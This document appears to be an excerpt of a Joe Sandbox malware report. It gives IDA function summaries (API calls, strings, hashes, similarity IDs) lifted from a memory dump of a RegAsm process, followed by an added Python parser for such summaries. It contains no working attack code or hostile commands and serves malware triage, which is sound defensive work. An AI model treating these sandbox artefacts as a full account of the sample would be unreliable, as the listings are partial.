                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Time$System$File$LocalSpecific
                                          • String ID:
                                          • API String ID: 979780441-0
                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                          APIs
                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$DialogHandleModuleParam
                                          • String ID:
                                          • API String ID: 1386444988-0
                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                          APIs
                                          • wcschr.MSVCRT ref: 0040F79E
                                          • wcschr.MSVCRT ref: 0040F7AC
                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: wcschr$memcpywcslen
                                          • String ID: "
                                          • API String ID: 1983396471-123907689
                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                          APIs
                                          • _snwprintf.MSVCRT ref: 0040A398
                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _snwprintfmemcpy
                                          • String ID: %2.2X
                                          • API String ID: 2789212964-323797159
                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _snwprintf
                                          • String ID: %%-%d.%ds
                                          • API String ID: 3988819677-2008345750
                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                          APIs
                                          • memset.MSVCRT ref: 0040E770
                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: F^@
                                          • API String ID: 568519121-3652327722
                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PlacementWindowmemset
                                          • String ID: WinPos
                                          • API String ID: 4036792311-2823255486
                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@DeleteObject
                                          • String ID: r!A
                                          • API String ID: 1103273653-628097481
                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                          APIs
                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                          • memset.MSVCRT ref: 0042BAAE
                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                          • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                          APIs
                                          • wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                          • free.MSVCRT ref: 0040A908
                                          • free.MSVCRT ref: 0040A92B
                                          • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$memcpy$mallocwcslen
                                          • String ID:
                                          • API String ID: 726966127-0
                                          • Opcode ID: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                          • Opcode Fuzzy Hash: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                          APIs
                                          • wcslen.MSVCRT ref: 0040B1DE
                                          • free.MSVCRT ref: 0040B201
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                          • free.MSVCRT ref: 0040B224
                                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$memcpy$mallocwcslen
                                          • String ID:
                                          • API String ID: 726966127-0
                                          • Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                          • Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                          APIs
                                          • strlen.MSVCRT ref: 0040B0D8
                                          • free.MSVCRT ref: 0040B0FB
                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                          • free.MSVCRT ref: 0040B12C
                                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 3669619086-0
                                          • Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                          • Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                          • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                          • malloc.MSVCRT ref: 00417407
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                          • free.MSVCRT ref: 00417425
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$freemalloc
                                          • String ID:
                                          • API String ID: 2605342592-0
                                          • Opcode ID: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                          • Opcode Fuzzy Hash: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
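The function summaries above all follow one fixed shape: an APIs list (with "Part of subcall function" sub-bullets for calls seen inside a callee), a Strings list, the memory dump the function was lifted from, the IDA plugin snapshot, and a Similarity group whose API String ID is built from the API ID and String ID pair (its second half is 0 whenever the String ID is empty, as in several blocks above). That ID is what lets the same function be matched across dumps and reports. The parser below is an added example, not Joe Sandbox code and not part of this report; it turns such blocks into dicts, profiles the imported API surface per module, and indexes the summaries by API String ID. The dict field names, and the assumption that every summary begins at its "APIs" label, are mine. The sample input is an abridged transcription of two of the summaries above with the hash lines left out.

```python
"""Parse Joe Sandbox function-summary blocks (the shape shown in the report above).
Added example, not Joe Sandbox code; field names and the 'APIs starts a block' rule are mine."""
import re

SECTION_NAMES = {"APIs", "Strings", "Memory Dump Source",
                 "Joe Sandbox IDA Plugin", "Similarity"}
SUBCALL_PREFIX = "Part of subcall function "

# "name.MODULE(args), ref: ADDR" or "name.MODULE ref: ADDR"; names like ??3@YAXPAX@Z need [^\s.(]+
API_RE = re.compile(
    r"^(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")


def parse_api_line(text):
    """Parse one API bullet; subcall bullets also record the callee the call was seen in."""
    callee = None
    if text.startswith(SUBCALL_PREFIX):
        callee, text = text[len(SUBCALL_PREFIX):].split(": ", 1)
    m = API_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised API line: {text!r}")
    args = m.group("args")
    return {
        "api": m.group("name"),
        "module": m.group("module"),
        "args": [a.strip() for a in args.split(",")] if args is not None else [],
        "ref": int(m.group("ref"), 16),
        "in_subcall": int(callee, 16) if callee else None,
    }


def parse_function_blocks(report):
    """Return one dict per function summary: its API calls, strings and ID fields."""
    blocks, current, section = [], None, None
    for raw in report.splitlines():
        line = raw.strip()
        if line in SECTION_NAMES:
            if line == "APIs":                  # a new summary begins here (assumption)
                current = {"apis": [], "strings": [], "meta": {}}
                blocks.append(current)
            section = line
        elif current is not None and line.startswith("•"):
            item = line[1:].strip()
            if section == "APIs":
                current["apis"].append(parse_api_line(item))
            elif section == "Strings":
                current["strings"].append(item)
            else:
                # The dump-source bullet packs "Source File: X, Offset: Y, based on
                # PE: true" into one line; every other bullet is a single key: value.
                parts = item.split(", ") if section == "Memory Dump Source" else [item]
                for part in parts:
                    key, _, value = part.partition(":")
                    current["meta"][key.strip()] = value.strip()
    return blocks


def api_profile(blocks):
    """Distinct APIs per module across all summaries: a quick capability triage view."""
    profile = {}
    for block in blocks:
        for call in block["apis"]:
            profile.setdefault(call["module"], set()).add(call["api"])
    return profile


def index_by_api_string_id(blocks):
    """Key summaries on API String ID so the same function can be matched across dumps."""
    return {b["meta"]["API String ID"]: b for b in blocks if "API String ID" in b["meta"]}


# Abridged transcription of two of the summaries above (hash lines left out).
SAMPLE = """\
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
• free.MSVCRT ref: 0040A908
Memory Dump Source
• Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
"""
```

Run `parse_function_blocks(SAMPLE)` on the report text copied out of the page (or the whole function-summary section; lines outside a block are ignored) and feed the result to `index_by_api_string_id` to diff two reports' function sets, or to `api_profile` to see at a glance which modules the dumped code touches. Parsed arguments also make constant operands easy to spot: the code page 0000FDE9 passed to MultiByteToWideChar in the last summary above is 65001, CP_UTF8.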